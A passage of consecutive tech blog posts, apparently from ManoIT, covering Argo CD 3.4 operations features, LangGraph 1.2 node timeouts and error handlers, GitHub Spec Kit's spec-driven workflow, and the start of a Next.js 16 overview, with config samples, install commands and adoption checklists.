Run multi-env, multi-region and your values files grow exponentially: values-base.yaml, values-prod.yaml, values-prod-apac.yaml, values-feature-x.yaml… Previously you had to list each one in valueFiles, and every new file meant editing the Application manifest too.

3.4 supports wildcard glob patterns in valueFiles (PR #26768, cherry-picked to 3.4 as #26919). Get your directory convention right and you can pull in "every environment file under values/" with a single line.

apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: payments
  namespace: argocd
spec:
  source:
    repoURL: https://git.internal/manoit/payments-chart
    targetRevision: main
    path: chart
    helm:
      valueFiles:
        - values/base.yaml
        # 3.4: collect env values via glob (sort order = merge order)
        - "values/prod-*.yaml"
  destination:
    server: https://kubernetes.default.svc
    namespace: payments

WARNING: globs merge matched files in sorted order. Helm lets later values override earlier ones, so control merge precedence explicitly with filename prefixes (e.g. 10-, 20-). 90% of "why isn't my prod value taking effect?" is a merge-order problem.

3.4 also added the ability to send custom User-Agent headers for Helm repository requests (PR #25473) — handy when an internal artifact proxy or OCI registry requires client identification.

4. Source Hydrator — Commit Authorship and UI Integration

The Source Hydrator that landed in 3.3 is a first-class implementation of the rendered-manifests pattern: it renders the source (dry source) kept in Git and commits it to a separate hydrated branch. Put it into production, though, and one thing grates immediately — every hydration commit has the same anonymous author, rendering audit logs and git blame meaningless.

3.4 makes the authorName/Email used for hydration commits configurable (PR #25746). It stamps an identity into the commit metadata — "this hydrate commit was made by which environment/bot" — restoring audit trails and accountability. After applying the setting, you can verify the identity is stamped correctly straight from the hydrated branch's commit log.

# Verify the hydrated branch's commit author is stamped with the bot identity
# (Source Hydrator renders the dry source and commits it to a separate hydrated branch)
git fetch origin environments/prod
git log origin/environments/prod --pretty='%h | %an <%ae> | %s' -n 5

# Expected output - before authorName/Email is set: anonymous/identical author
#   3f1a2b9 | argocd <argocd@noreply> | hydrate: payments @ a1b2c3d
# After: environment/bot identity is clearly distinguished
#   9c8d7e6 | argocd-hydrator-prod <gitops-bot+prod@manoit.co.kr> | hydrate: payments @ a1b2c3d

On top of that came UI integration — you can enable the hydrator from the app-create panel (#26485) and view hydrator properties directly in the Summary tab (#26152). On the stability side, GetDrySource() was fixed to preserve all source-type fields (cherry-pick #27189→#27196), and a batch of 3.3-era hydrator bugs (missing hydrated SHA on no-ops, missing creds) were cleaned up.

Area	3.4 change	Operational effect
Commit metadata	authorName/Email configurable (#25746)	Restores audit log / blame
UI	Hydrator toggle in create panel (#26485), Summary tab exposure (#26152)	Config visibility, fewer mistakes
Stability	GetDrySource field preservation, no-op SHA/creds fixes	Higher hydration reliability

5. ApplicationSet Operability — Health Field, Watch, listResourceEvents

The real unit of large-scale GitOps isn't a single Application — it's the ApplicationSet (AppSet). In a structure that stamps out tens to hundreds of apps at once via cluster/directory/Git generators, 3.4 elevates AppSet into a first-class, operable object.

Health field added to status (#25753) — read overall AppSet health directly from status, no need to manually aggregate hundreds of child apps.
ApplicationSet Watch API (#26409) and listResourceEvents API (#25537) — standard APIs to stream/query AppSet changes and events. External dashboards and automation attach via watch instead of polling.
Controller performance/correctness — the path that fetches cluster secrets was optimized, and AppSets in disallowed namespaces no longer trigger unnecessary reconciles on cluster-secret changes (#25622). A DuckType generator panic on non-string values was also fixed (cherry-pick #27265→#27526).

The UI gained an AppSet slide-out summary, a tree-view detail page, and a list page, completing the "operate AppSets visually" experience.

6. Notification & Networking — appProject Access and gRPC DNS TXT Opt-Out

Notifications are also core to Day-2. 3.4 lets notification templates access appProject information (#26470) — so you can put "which project's app failed to sync" directly into the alert body, sharpening routing accuracy. It also exposes the notifications controller's processors count as a command parameter (#26798) to tune throughput in high-volume alert environments.

The most operationally relevant networking change is disabling gRPC service-config DNS TXT lookups by default (#26077). It looks small but the root cause runs deep — in dual-stack (IPv4+IPv6) Kubernetes environments, gRPC clients excessively queried DNS TXT records looking for service config, causing timeouts and latency. 3.4 turns that lookup off by default, improving controller stability on dual-stack clusters.

If you've experienced "Argo CD intermittently slowing down" on a dual-stack cluster, the 3.4 upgrade alone may make the symptom disappear. This change is a default, so no extra configuration is required.

7. Upgrade Watch-Outs — Helm 3.19 K8s Version Interpretation, Dex 2.45, MS Teams O365 Connectors

3.4 is an operations-hardening release with a light migration burden, but check these three before upgrading.

Item	Change	Action
Helm 3.19.0	How Helm interprets the K8s cluster version changed → Argo CD aligns to it	Regression-test charts that depend on `.Capabilities.KubeVersion` rendering
Dex 2.45.0	Bundled Dex version upgrade (SSO)	Validate Dex connector config / OIDC flow in staging
MS Teams notifications	Microsoft deprecates and removes legacy Office 365 Connectors	Migrate Teams webhook delivery to the new mechanism

WARNING: if you were sending Teams notifications via O365 Connector webhooks, this is not "optional" but "required." Microsoft's deprecation breaks the existing path, so alert delivery itself may stop independent of the 3.4 upgrade.

8. ManoIT Internal Adoption Checklist

#	Task	Owner	Done criteria
1	Upgrade to 3.4.x in staging, reflect non-HA→HA manifest diffs	Platform	All apps Synced/Healthy post-upgrade
2	Helm 3.19 K8s version interpretation — regression-test KubeVersion-dependent charts	Chart owners	Render diff = 0 (excl. intended changes)
3	Add cluster pause annotation to the incident runbook	SRE	Pause/resume/diff procedure validated in a mock incident
4	Reorganize per-env values into glob rules (prefix ordering)	Domain owners	Deterministic merge order (snapshot test)
5	Assign per-env bot identity for Source Hydrator commit author (authorName/Email)	Platform	Identity visible in hydrated-branch blame
6	Move external dashboards from polling to AppSet Health field + Watch API	Observability	Lower dashboard latency, fewer API calls
7	Add appProject context to notification templates, migrate MS Teams path	SRE	Per-project routing + Teams delivery working
8	Measure gRPC DNS TXT-off effect (latency p99) on dual-stack clusters	Network	Controller reconcile latency stabilized

9. Conclusion — "The Next GitOps Challenge Isn't Deployment, It's Operations"

In one line, Argo CD 3.4 is a declaration that deployment automation is already a solved problem, and what remains is the Day-2 work of safely pausing, tracking, and routing that automation in the middle of an incident. Per-cluster pause aligns the unit of incident response with reality (the cluster); Helm valueFiles globs collapse the environment explosion into one line; the Source Hydrator's commit authorship returns audit trails to the rendered-manifests pattern. ApplicationSet's Health/Watch/listResourceEvents elevate the real unit of large-scale GitOps to a first-class object, and the gRPC DNS TXT default opt-out quietly removes invisible latency on dual-stack environments.

Three closing recommendations. (1) Before upgrading, check the Helm 3.19 impact and the MS Teams O365 Connector deprecation first — neither tolerates "later." (2) Put cluster pause into your runbook first — it's the change that raises incident-response capability the most for the least code. (3) If you use the Source Hydrator, set the commit author first — auto-commits without an audit trail are a powder keg for operational incidents. The shortest one-line recommendation: "This sprint, bump staging to 3.4 and run the cluster-pause → diff → selective-sync procedure once in a mock incident."

Originally published at ManoIT Tech Blog.

LangGraph 1.2 Deep Dive — Per-Node Timeouts, Error Handlers, Graceful Shutdown, DeltaChannel & Streaming v3

daniel jeong — Mon, 01 Jun 2026 01:58:10 +0000

When you move an AI agent from demo to production, the first thing to break is almost always the long-running path. An LLM call hangs at 30 seconds, an external tool stalls forever, or a rolling deploy SIGKILLs an in-flight agent — and that single failure wipes out tens of minutes of accumulated state. LangGraph 1.2.0 (released May 12, 2026) takes direct aim at exactly this. The official changelog summarizes it as "finer-grained control over node execution (timeouts, error recovery, and graceful shutdown), a new channel type that cuts checkpoint overhead for long-running threads, and a content-block-centric streaming API (v3)." The underlying idea is consistent: treat an agent run as a durable graph execution, not a Python function call. This post breaks down the five new capabilities from an operations and architecture angle, and lays out how ManoIT rolled them into its internal agent pipeline.

1. Why 1.2 — 1.0's durability, 1.1's type safety, 1.2's node control

Context first. LangGraph 1.0 went GA in October 2025 with a promise of no breaking changes until 2.0, establishing durable state, checkpointer-based resumption, and first-class human-in-the-loop. 1.1 (2026-03-10) added type-safe streaming/invoke and Pydantic/dataclass coercion behind an opt-in version="v2". And 1.2 pushes fault-tolerance controls that previously existed only at the whole-graph level down to the individual node level.

Version	Released	Theme	Key API
1.0.0	2025-10-20	Durable execution GA (persistence, resume, HITL)	`checkpointer`, `interrupt`
1.1.0	2026-03-10	Type-safe streaming/invoke	`version="v2"`, `GraphOutput`
1.2.0	2026-05-12	Node-level fault tolerance + streaming v3	`timeout=`, `error_handler=`, `DeltaChannel`, `version="v3"`

One caveat up front: the new timeouts and error handlers are Python-only, and timeouts work on async nodes only. Retry policies, however, continue to work in both Python and TypeScript.

2. Per-node timeouts — the decisive difference between run_timeout and idle_timeout

Previously there was no standard way to stop a single node from hanging forever. 1.2 adds add_node(..., timeout=) to cap how long a single attempt may run. The key is that it separates two kinds of limits:

run_timeout — a hard wall-clock limit. "This attempt must finish within N seconds," regardless of progress.
idle_timeout — an idle limit that resets on progress. It keeps a streaming LLM call (whose tokens keep flowing) alive while catching only a genuine stall.

You can supply both via TimeoutPolicy. When a limit fires, LangGraph raises NodeTimeoutError, clears the writes from that attempt, and hands off to the retry policy — so a timeout never leaves partial state behind.

from langgraph.graph import StateGraph
from langgraph.types import TimeoutPolicy, RetryPolicy

# NOTE: timeouts are async-node-only + Python-only
async def call_model(state: AgentState) -> dict:
    # Streaming LLM call — idle_timeout resets while tokens flow
    return {"messages": [await llm.ainvoke(state["messages"])]}

builder = StateGraph(AgentState)
builder.add_node(
    "call_model",
    call_model,
    # Hard 90s cap, but abort if 15s pass with no progress
    timeout=TimeoutPolicy(run_timeout=90.0, idle_timeout=15.0),
    retry_policy=RetryPolicy(max_attempts=3),  # timeout -> handed to retry
)

Operational guidance: put a run_timeout on external API/tool nodes to eliminate infinite waits, and use idle_timeout on streaming LLM nodes to catch stalls without killing legitimately long responses. Supplying both is the safest default.

3. Node-level error handlers — first-class Saga / compensation

When a node still fails after retries are exhausted, the whole graph used to blow up with an exception. 1.2 adds add_node(..., error_handler=) — a recovery function that runs after all retries are exhausted. The handler receives a typed NodeError and can return a Command to update state and route to a different node. This expresses Saga / compensating transactions — the "if one of several steps fails, roll back the earlier ones" pattern — declaratively inside the graph.

from langgraph.types import Command
from langgraph.errors import NodeError

def on_payment_failed(state: OrderState, error: NodeError) -> Command:
    # All retries failed -> compensate: release the reservation, route to rollback
    return Command(
        update={"status": "payment_failed", "error": str(error)},
        goto="release_inventory",   # compensation node that rolls back the prior step
    )

builder.add_node(
    "charge_payment",
    charge_payment,
    retry_policy=RetryPolicy(max_attempts=3),
    error_handler=on_payment_failed,  # called only after 3 failed attempts
)

The point is that you stop scattering exceptions across try/except blocks. The post-failure compensation flow becomes part of the graph topology, so failure paths show up in visualization, replay, and checkpoint analysis.

4. Graceful shutdown — deploy without losing state

Killing an in-flight agent with SIGKILL during a rolling deploy or scale-down evaporates work in progress. 1.2's graceful shutdown stops the run cooperatively right after the current superstep completes and saves a resumable checkpoint. Create a RunControl and call request_drain() from any thread; the run raises GraphDrained and can be resumed later from exactly that point with the same config.

from langgraph.runtime import RunControl

run_control = RunControl()

# e.g. in a SIGTERM handler — drain safely when the deploy signal arrives
def handle_sigterm(signum, frame):
    run_control.request_drain()  # callable from any thread

config = {"configurable": {"thread_id": "order-42"}, "run_control": run_control}
try:
    result = await graph.ainvoke(inputs, config=config)
except GraphDrained:
    # checkpoint already saved -> resume with the same config on the next pod
    log.info("drained; will resume from last checkpoint on next pod")

This breaks the "deploy = work loss" equation. A new pod resuming with the same thread_id picks up right after the superstep where the drain happened.

5. DeltaChannel — cut long-thread checkpoint cost to increments

A normal channel re-serializes the full accumulated value on every step. For channels that grow over time — like a message list — checkpoint write cost balloons in proportion to thread length. DeltaChannel (beta) stores only the incremental delta per step to cut that overhead. Since pure deltas would make reads expensive to reconstruct, snapshot_frequency=K writes a full snapshot every K steps to keep read latency bounded.

from typing import Annotated
from langgraph.channels import DeltaChannel
from langgraph.graph.message import add_messages

class AgentState(TypedDict):
    # DeltaChannel on a long-growing message channel
    # full snapshot every 5 steps -> lower write cost, bounded read latency
    messages: Annotated[list, DeltaChannel(add_messages, snapshot_frequency=5)]

Aspect	Default channel	DeltaChannel (beta)
Per-step serialization	Re-serialize full value	Store delta only
Write cost	Grows with thread length	Converges to ~constant
Read latency	Low (full value on hand)	Bounded via `snapshot_frequency`
Best for	Small, rarely-changing channels	Long, large channels (message lists)

6. Streaming API v3 — content-block-centric, typed projections

Streaming chunk shapes used to differ per mode, making UI integration awkward. 1.2's new event streaming API activates when you pass version="v3" to stream_events() / astream_events(), offering a content-block-centric protocol with typed, per-channel projections. The four first-class projections are run.values, run.messages, run.lifecycle, and run.subgraphs, plus opt-in transformers for updates, custom events, checkpoints, tasks, and debug. Notably, run.messages yields one ChatModelStream per LLM call, with typed sub-projections for text, reasoning, tool calls, and usage. version="v1" and "v2" are unchanged, so migration is gradual.

# content-block-centric streaming — run.messages is one ChatModelStream per LLM call
async for event in graph.astream_events(inputs, config, version="v3"):
    for part in event.run.messages:          # ChatModelStream
        if part.text:        yield_to_ui(part.text)        # body text
        if part.reasoning:   debug(part.reasoning)         # reasoning trace
        if part.tool_calls:  trace_tools(part.tool_calls)  # tool calls
        if part.usage:       meter(part.usage)             # token usage / cost

Projection	Content	Typical use
`run.values`	Current graph state values	Render final/intermediate state
`run.messages`	One `ChatModelStream` per LLM call	Token streaming UI, cost metering
`run.lifecycle`	Node start/end lifecycle events	Progress, observability
`run.subgraphs`	Per-subgraph events	Multi-agent / nested graph tracing

7. The ecosystem — langchain 1.3 and deepagents 0.6 shipped the same day

1.2 didn't ship alone. On the same day, May 12, 2026, langchain v1.3.0 added version="v3" support in stream_events() / astream_events() for create_agent-based agents, and deepagents v0.6.0 added (1) an experimental CodeInterpreterMiddleware that enables code execution and programmatic tool calling through a scoped QuickJS runtime, and (2) the same version="v3" streaming support. So v3 streaming is aligned across the LangGraph runtime, the LangChain agent layer, and Deep Agents at once — whichever layer you start from, you consume the same content-block protocol.

8. ManoIT internal adoption checklist

#	Task	Owner	Done criteria
1	Pin to `langgraph` 1.2.0 / `langchain` 1.3.0 (confirm no breaking changes)	Platform	Lockfile + CI green
2	Convert external tool/LLM nodes to async (timeout prerequisite)	Domain owners	100% target nodes async
3	`run_timeout` on tool nodes, `idle_timeout` on streaming nodes	Domain owners	0 infinite waits (load test)
4	`error_handler` + compensation node on irreversible steps (payment, booking)	Backend	Auto-rollback on fault injection
5	Wire SIGTERM -> `request_drain()`, verify resume	SRE	0 work loss during rolling deploy
6	Apply/tune `DeltaChannel(snapshot_frequency=K)` on long channels	Platform	Lower checkpoint p99 write time
7	Migrate stream consumption to `version="v3"` (run v2 in parallel)	Frontend/BFF	Unified token UI + usage metering
8	PoC deepagents `CodeInterpreterMiddleware` (sandbox isolation)	AI team	QuickJS isolation + resource limits verified

9. Conclusion — "an agent isn't a function; it's a durable graph that dies and revives per node"

In one line, LangGraph 1.2 is "the release that pushed fault tolerance down from the whole graph to individual nodes, finally lifting agent execution into truly operable durable execution." run_timeout/idle_timeout separate "infinite wait" from "legitimately long response," error_handler folds post-failure compensation into the graph topology, and request_drain() turns deploys into work-loss-free events. DeltaChannel tackles long-thread checkpoint cost, and Streaming v3 cleans up the previously inconsistent stream shapes.

Three operational recommendations to close. (1) Make nodes async before adopting timeouts — timeouts are async/Python-only, so without this prerequisite they're inert. (2) Always pair irreversible steps with a compensation node — piling on retries without an error_handler just turns "graph explodes after 3 failures" into a production incident. (3) Wire request_drain() into your deploy pipeline first — it's the smallest change that buys the most stability. The shortest one-liner: this sprint, attach a TimeoutPolicy and an error_handler to your single most stall-prone tool node, wire a drain into rolling deploys, and measure zero work loss.

This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official LangChain changelog (docs.langchain.com — langgraph v1.2.0 / langchain v1.3.0 / deepagents v0.6.0, May 12, 2026 entries), the langchain-ai/langgraph GitHub Releases, and the LangGraph durable execution / persistence / human-in-the-loop docs as primary sources. API names, signatures, and behaviors reflect the official changelog as of publication (2026-06-01); DeltaChannel and v3 streaming are explicitly beta and may change. Code samples are illustrative, based on documented signatures — verify the latest API and beta status on docs.langchain.com and GitHub Releases before production use. Timeouts and error handlers are Python-only; timeouts work on async nodes only.

Originally published at ManoIT Tech Blog.

GitHub Spec Kit Deep Dive — Spec-Driven Development, the Constitution, /speckit.* Slash Commands, and the Specify CLI for Taming AI Coding Agents

daniel jeong — Sun, 31 May 2026 13:03:24 +0000

As AI coding agents become routine, the most common failure mode is vibe coding: you start with a one-line prompt and the code itself silently becomes the spec. Code is inherently a binding artifact — once an implementation is locked in, every shifting requirement triggers expensive rework. GitHub Spec Kit flips this on its head. Instead of treating specifications as throwaway scaffolding you discard once "real coding" begins, it promotes the specification to a first-class, executable artifact — the heart of Spec-Driven Development (SDD).

Open-sourced by GitHub in September 2025, Spec Kit has grown into the most widely adopted SDD tool as of May 2026, with 90k+ stars and 8k+ forks. Its official docs were last updated on May 27, 2026, and it now supports 30+ coding agents. This guide breaks down the Constitution, the /speckit.* slash commands, and the Specify CLI from an operations and architecture lens — plus the rollout checklist ManoIT used internally.

1. Why Spec-Driven Development in 2026

As Microsoft's developer blog puts it, SDD is not about long requirement docs nobody reads, and it's not a return to waterfall. The point is to make technical decisions explicit, reviewable, and evolvable — "version control for your thinking." If three sprints into a notification system the PM assumed per-channel toggles, the backend built a single on/off switch, and the frontend wired up OS notifications, that's not a communication failure — it's a missing shared context. SDD surfaces those assumptions when changing direction costs a few keystrokes, not entire sprints.

This matters even more with AI agents. Because the spec lives outside the code, you can generate a Rust and a Go variant from the same spec to compare performance, or explore multiple design directions in parallel — multi-variant implementation. The spec becomes the asset that steers the agent toward the right solution.

Aspect	Traditional / Vibe Coding	Spec-Driven Development
Primary artifact	Code (spec is scaffolding, discarded)	Spec (executable, generates code)
Requirement negotiation	Negotiated in code → costly rework	Negotiated in Markdown → a few keystrokes
Decision record	Email, someone's head, scattered docs	Version-controlled spec / plan / constitution
AI agents	One-shot prompt, unpredictable result	Multi-step refinement, steered by shared context
Tool lock-in	Bound to agent / IDE	30+ swappable agents, spec stays constant

2. Specify CLI — install and bootstrap

Spec Kit has two pillars: (1) the Specify CLI (Python-based, MIT-licensed, package specify-cli) that scaffolds a project for SDD, and (2) a bundle of templates and helper scripts defining what a spec, plan, and task list look like. There is no magic beyond these two parts. Prerequisites:

Linux / macOS / Windows (native or WSL)
A supported AI coding agent (Copilot, Claude, Gemini, Codex, Cursor, Windsurf, and 30+ others)
uv (recommended) or pipx for persistent install · Python 3.11+ · Git

# Persistent install (recommended) — replace vX.Y.Z with the latest Releases tag
uv tool install specify-cli --from git+https://github.com/github/spec-kit.git@vX.Y.Z

# Or bootstrap directly with a one-off run (uvx)
uvx --from git+https://github.com/github/spec-kit.git specify init my-project

# Initialize a project and pick your agent
specify init my-project --integration copilot
cd my-project

# List integrations available in your installed version
specify integration list

Initialization creates a .specify/ folder plus an agent-specific folder (e.g. .github/ for Copilot). .specify holds the spec/plan/tasks templates and the scripts for your platform (bash for POSIX, PowerShell for native Windows). And one file you may not have seen before — memory/constitution.md — is the keystone.

# Structure created after `specify init` (abridged)
my-project/
├── .github/                      # agent-specific: slash-command prompt definitions
│   └── prompts/
│       ├── specify.prompt.md
│       ├── plan.prompt.md
│       └── tasks.prompt.md
└── .specify/
    ├── memory/
    │   └── constitution.md       # non-negotiable principles (project constitution)
    ├── scripts/                  # bash or powershell helpers
    └── templates/                # spec / plan / tasks / agent-file templates

On init, Specify ensures you're inside a Git repository (creating one if needed). The helper scripts then force all work onto the same feature branch and keep subsequent prompts correctly referencing the spec, plan, and data contracts created earlier.

3. The Constitution — lock non-negotiables before any code

In SDD, the Constitution captures a project's non-negotiable principles: "web apps always follow this testing approach," "every app this team builds is CLI-first," and so on — pinned down before any SDD iteration begins. This is how organizations establish an opinionated stack that guides every new and existing project.

# Run your agent in the project dir, then first of all:
/speckit.constitution Create principles focused on code quality, testing standards, user experience consistency, and performance requirements

This creates or updates .specify/memory/constitution.md, which the agent references during the specify, plan, and implement phases. The constitution isn't just a doc — it's a guardrail that binds every subsequent step. The plan produced by /speckit.plan is grounded by the constitution, suppressing decisions that violate your conventions.

4. The core workflow — /speckit.* slash commands

At launch, Spec Kit started with three commands (/specify, /plan, /tasks). As of 2026 they've settled into a namespaced /speckit.* scheme (Codex CLI in skills mode uses $speckit-*). In one line the flow is Spec → Plan → Tasks → Implement, with the constitution and quality gates wrapped above and below.

4.1 Core commands

Command	Agent skill	Role
`/speckit.constitution`	`speckit-constitution`	Create/update governing principles and dev guidelines
`/speckit.specify`	`speckit-specify`	Define the what & why — requirements and user stories (PRD)
`/speckit.plan`	`speckit-plan`	The how — implementation plan with your chosen stack/architecture
`/speckit.tasks`	`speckit-tasks`	Break the plan into an actionable task list
`/speckit.taskstoissues`	`speckit-taskstoissues`	Convert tasks into GitHub issues for tracking/execution
`/speckit.implement`	`speckit-implement`	Execute all tasks to build the feature per the plan

/speckit.specify explicitly excludes technical decisions — you write motivations and functional requirements, not the stack. Conversely /speckit.plan handles the "how" (frameworks, libraries, DB, infra) and produces extra metadata like research, data contracts, and a quickstart so teammates can start experimenting immediately.

# Step 4: what / why (do NOT specify the stack)
/speckit.specify Build an app that organizes photos into albums grouped by date,
re-orderable by drag-and-drop on the main page, no nested albums, tile-style previews per album.

# Step 5: how (stack / architecture)
/speckit.plan Use Vite with minimal libraries. Prefer vanilla HTML/CSS/JS.
Images are not uploaded anywhere; metadata stored in local SQLite.

# Step 6: break into tasks
/speckit.tasks

# Step 7: execute implementation
/speckit.implement

4.2 Optional commands — the quality gates

Command	Agent skill	Role / recommended timing
`/speckit.clarify`	`speckit-clarify`	Resolve underspecified areas via questions — before `plan` (formerly `/quizme`)
`/speckit.analyze`	`speckit-analyze`	Cross-artifact consistency & coverage — after `tasks`, before `implement`
`/speckit.checklist`	`speckit-checklist`	Generate requirement completeness/clarity checklists ("unit tests for English")

In practice the most recommended end-to-end flow is constitution → specify → clarify → plan → tasks → analyze → implement. Filling spec gaps with clarify and verifying that spec/plan/tasks don't contradict each other with analyze before implementing is what cuts rework the most.

flowchart TD
  A["/speckit.constitution\nproject constitution = non-negotiables"] --> B["/speckit.specify\nwhat / why (PRD)"]
  B --> C["/speckit.clarify\nresolve ambiguity"]
  C --> D["/speckit.plan\nhow (stack / architecture)"]
  D --> E["/speckit.tasks\nactionable task breakdown"]
  E --> F["/speckit.analyze\nartifact consistency / coverage"]
  F --> G{"consistent?"}
  G -->|no| B
  G -->|yes| H["/speckit.implement\nexecute tasks -> code"]
  H --> I["verify: tests + manual review\ncompare spec vs implementation"]
  I --> J{"spec satisfied?"}
  J -->|no| C
  J -->|yes| K["merge / next feature branch"]
  A -. grounding .-> D
  A -. grounding .-> H

5. Extensions and presets — organizational customization

Spec Kit can be tailored via two complementary systems — Extensions and Presets — plus project-local overrides. Templates are resolved at runtime: Spec Kit walks the priority stack top-down and uses the first match.

Priority	Component	Location
1 (highest)	Project-local overrides	`.specify/templates/overrides/`
2	Presets — customize core & extensions	`.specify/presets/templates/`
3	Extensions — add new capabilities	`.specify/extensions/templates/`
4 (lowest)	Spec Kit Core — built-in SDD commands & templates	`.specify/templates/`

For integrations that support skills mode, --integration <agent> --integration-options="--skills" installs agent skills instead of slash-command prompt files — so you can ship the same SDD workflow as either slash commands or skills.

6. Limits and operational caveats — "the spec is perfect, the code is empty"

SDD is not a silver bullet. The most-raised issues in the official blog's comments map directly onto real operational risks.

False done: the spec/plan/tasks docs read beautifully, the agent reports "implementation complete," yet much of the functionality is missing and there are zero tests. → Don't treat /speckit.implement as a trusted finish line. Pin "every feature ships with tests" into the constitution and compare implementation against the spec via checklist and real test runs.
What goes in the spec: a fundamental question — "user stories, or some other form?" A more detailed first prompt dramatically improves spec quality, so be concrete about the experiences critical to success and what you explicitly don't want.
Multi-agent, multi-developer: in one monorepo with devs using Cursor, Claude Code, and Gemini CLI, how do you keep a single spec? → Keep the spec outside the IDE, versioned alongside the repo. Then swapping tools still means implementing against the same contract, and the speedup comes from alignment.

In short, SDD's speed comes not from "faster typing" but from alignment — and alignment holds only when a human reviews and approves the constitution and spec to the end.

7. ManoIT internal rollout checklist

#	Task	Owner	Done criteria
1	Prep prerequisites — uv, Python 3.11+, Git; pick a standard agent	Platform	`specify integration list` works
2	Apply `specify init --integration <agent>` to a PoC repo	Lead eng	`.specify/` + agent folder created
3	Author a company-standard `constitution.md` (tests, security, CLI-first)	Architect	Shared constitution PR merged
4	Run specify→clarify→plan once on a representative feature	Domain owners	spec/plan/data contract produced
5	Mandate the `analyze` consistency gate after `tasks`	Domain owners	implement only at zero warnings
6	Standardize `checklist` + real tests to prevent "false done"	QA	impl-vs-spec comparison report
7	Version specs under `specs/` per feature branch	Platform	same spec reused after tool swap
8	Standardize internal templates via Extensions/Presets	DX	auto-applied on new-repo scaffolding
9	Wire `taskstoissues` to link tasks ↔ GitHub issues	Each team	auto-loaded onto sprint board

8. Conclusion — "intent before code, constitution above the agent"

In one line, GitHub Spec Kit is a toolkit that pins intent, plan, and principles into an executable spec before code, in order to control what AI agents output. The Constitution turns an organization's non-negotiables into a guardrail across every step, and the staged /speckit.specify → clarify → plan → tasks → analyze → implement flow separates "what/why" from "how" so each decision is reviewable. The Specify CLI bootstraps all of this across 30+ agents with near-zero config — but remember the tool itself is "not magic, just templates + scripts."

Three operational recommendations to close: (1) Start with the constitution — if you don't pin testing, security, and architecture conventions into constitution.md first, you'll be left with empty implementations behind well-written specs. (2) Don't skip clarify and analyze — resolving ambiguity and checking artifact consistency cut implementation rework the most. (3) Version specs like code — the spec must live outside the IDE in the repo so you can collaborate against the same contract even when tools change. The shortest possible advice: run specify init on one PoC repo this sprint, write your internal constitution, and complete one full pass on a representative feature.

This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), using the GitHub Spec Kit official docs (github.github.com/spec-kit, updated 2026-05-27), the github/spec-kit repository README (slash commands and CLI reference), the Microsoft developer blog (Den Delimarsky, 2025-09-15) and its community discussion, and SDD adoption reporting as primary sources. Command names, CLI options, directory structure, and statistics reflect official docs as of 2026-05-31; Spec Kit is explicitly an experimental project and may change. Verify the latest commands and integration status at github.com/github/spec-kit Releases before adopting in production.

Originally published at ManoIT Tech Blog.

Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware to proxy.ts, and 16.2's AI-Native DevTools

daniel jeong — Fri, 29 May 2026 23:52:25 +0000

Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware → proxy.ts, and 16.2's AI-Native DevTools Redefining the 2026 React Full-Stack Standard

TL;DR

Next.js 16 went GA on October 21, 2025, then evolved through 16.1 and the March 18, 2026 16.2 into the 16.2.x patch line shipping as of May 2026.

Cache Components and the "use cache" directive flip the App Router from implicit caching to an explicit, opt-in model — dynamic by default, cached only where you say so, with compiler-generated cache keys.

Turbopack is now the stable default bundler: 2–5× faster production builds and up to 10× faster Fast Refresh, no config required.

middleware.ts becomes proxy.ts to make the request-time network boundary explicit (Node.js runtime).

New caching APIs revalidateTag / updateTag / refresh separate SWR, read-your-writes, and uncached-refresh intents; React 19.2 (View Transitions, Activity, useEffectEvent) and React Compiler 1.0 support are stable.

16.2 turns the framework AI-native: AGENTS.md by default, browser log forwarding, and an experimental Agent DevTools CLI.

Vercel shipped Next.js 16 as GA on October 21, 2025, then followed with 16.1 and, on March 18, 2026, 16.2 — landing on the 16.2.x patch line by May 2026. It's the endpoint of the arc that ran through 13 (App Router), 14 (Server Actions), and 15 (async APIs, Turbopack beta). In one paragraph: (1) Cache Components and the "use cache" directive end the implicit caching that frustrated developers most, replacing it with an explicit opt-in model; (2) Turbopack is stabilized as the default bundler, delivering 2–5× builds and up to 10× Fast Refresh as a zero-config default; and (3) middleware.ts is renamed proxy.ts to clarify its identity as a request-time proxy in front of the cache. Add (4) the revalidateTag/updateTag/refresh caching APIs, (5) React 19.2 and React Compiler stabilization, (6) a layout-deduplication / incremental-prefetch routing overhaul, and (7) 16.2's AGENTS.md, browser log forwarding, and Agent DevTools. This article decomposes the root cause of each change from an operations/DX standpoint and lays out the step-by-step migration, validation, and rollback playbook ManoIT applied to its internal Next.js services.

1. Why May 2026's Next.js 16 matters

Through Next.js 15, the biggest friction in the App Router was "you can't predict what gets cached." Default fetch caching, the Full Route Cache, and the Router Cache were implicitly entangled, making unintended static optimization and stale data frequent debugging points. Next.js 16 inverts the philosophy head-on — dynamic by default, caching is explicit opt-in — while promoting the beta Turbopack to the default bundler so the framework delivers the fast startup and builds a full-stack framework is expected to provide, with no configuration.

Version	Released	Key change
Next.js 13	2022.10	App Router & Server Components
Next.js 14	2023.10	Server Actions stable, PPR preview
Next.js 15	2024.10	async params/cookies/headers, Turbopack beta, React 19
Next.js 16	2025.10.21	Cache Components (use cache), Turbopack stable, proxy.ts, React 19.2
Next.js 16.1	2025.12	Cache Components refinement, DX, caching-API hardening
Next.js 16.2	2026.03.18	AGENTS.md by default, browser log forwarding, Agent DevTools, ~87% faster dev startup

Upgrades start with a single codemod:

# Automated upgrade codemod (recommended)
npx @next/codemod@canary upgrade latest

# ...or upgrade manually
npm install next@latest react@latest react-dom@latest

# ...or start fresh
npx create-next-app@latest

2. Cache Components — ending implicit caching with use cache

This is 16's biggest paradigm shift. The previous App Router inferred "should this page be static or dynamic"; in 16, all dynamic code executes at request time by default, and you attach "use cache" only to the pages, components, or functions you want cached. The compiler auto-generates a cache key wherever "use cache" appears, reducing manual-key mistakes.

Enabling it is one line in next.config.ts. The old experimental.dynamicIO is renamed cacheComponents, and the experimental.ppr flag is removed and absorbed into this model.

// next.config.ts
const nextConfig = {
  cacheComponents: true,
};

export default nextConfig;

In practice you declare the directive at the top of a function, component, or file. Combined with PPR (Partial Prerendering), it streams a static shell immediately while flowing dynamic parts through Suspense boundaries.

// app/products/page.tsx
import { Suspense } from 'react';

// Statically cached header — rendered once
async function ProductHeader() {
  'use cache';
  const meta = await getCatalogMeta();
  return <h2>{meta.title}</h2>;
}

// Dynamic — runs on every request
